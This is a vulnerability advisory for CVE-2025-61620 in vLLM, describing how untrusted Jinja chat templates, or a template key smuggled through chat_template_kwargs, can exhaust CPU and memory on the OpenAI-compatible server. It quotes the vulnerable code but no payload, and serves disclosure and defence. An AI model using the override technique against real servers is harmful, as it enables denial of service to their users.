PT-2025-41232 · Pypi · Vllm
Published
2025-10-07
·
Updated
2025-10-07
·
CVE-2025-61620
CVSS v3.1
6.5
Medium
| AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H |
Summary
A resource-exhaustion (denial-of-service) vulnerability exists in multiple endpoints of the OpenAI-Compatible Server due to the ability to specify Jinja templates via the
chat template and chat template kwargs parameters. If an attacker can supply these parameters to the API, they can cause a service outage by exhausting CPU and/or memory resources.Details
When using an LLM as a chat model, the conversation history must be rendered into a text input for the model. In
hf/transformer, this rendering is performed using a Jinja template. The OpenAI-Compatible Server launched by vllm serve exposes a chat template parameter that lets users specify that template. In addition, the server accepts a chat template kwargs parameter to pass extra keyword arguments to the rendering function.Because Jinja templates support programming-language-like constructs (loops, nested iterations, etc.), a crafted template can consume extremely large amounts of CPU and memory and thereby trigger a denial-of-service condition.
Importantly, simply forbidding the
chat template parameter does not fully mitigate the issue. The implementation constructs a dictionary of keyword arguments for apply hf chat template and then updates that dictionary with the user-supplied chat template kwargs via dict.update. Since dict.update can overwrite existing keys, an attacker can place a chat template key inside chat template kwargs to replace the template that will be used by apply hf chat template.# vllm/entrypoints/openai/serving engine.py#L794-L816
chat template kwargs: dict[str, Any] = dict(
chat template=chat template,
add generation prompt=add generation prompt,
continue final message=continue final message,
tools=tool dicts,
documents=documents,
)
chat template kwargs.update(chat template kwargs or {})
request prompt: Union[str, list[int]]
if isinstance(tokenizer, MistralTokenizer):
...
else:
request prompt = apply hf chat template(
tokenizer=tokenizer,
conversation=conversation,
model config=model config,
** chat template kwargs,
)
Impact
If an OpenAI-Compatible Server exposes endpoints that accept
chat template or chat template kwargs from untrusted clients, an attacker can submit a malicious Jinja template (directly or by overriding chat template inside chat template kwargs) that consumes excessive CPU and/or memory. This can result in a resource-exhaustion denial-of-service that renders the server unresponsive to legitimate requests.Fixes
Fix
RCE
Allocation of Resources Without Limits
Resource Exhaustion
Found an issue in the description? Have something to add? Feel free to write us 👾
Related Identifiers
Affected Products
Vllm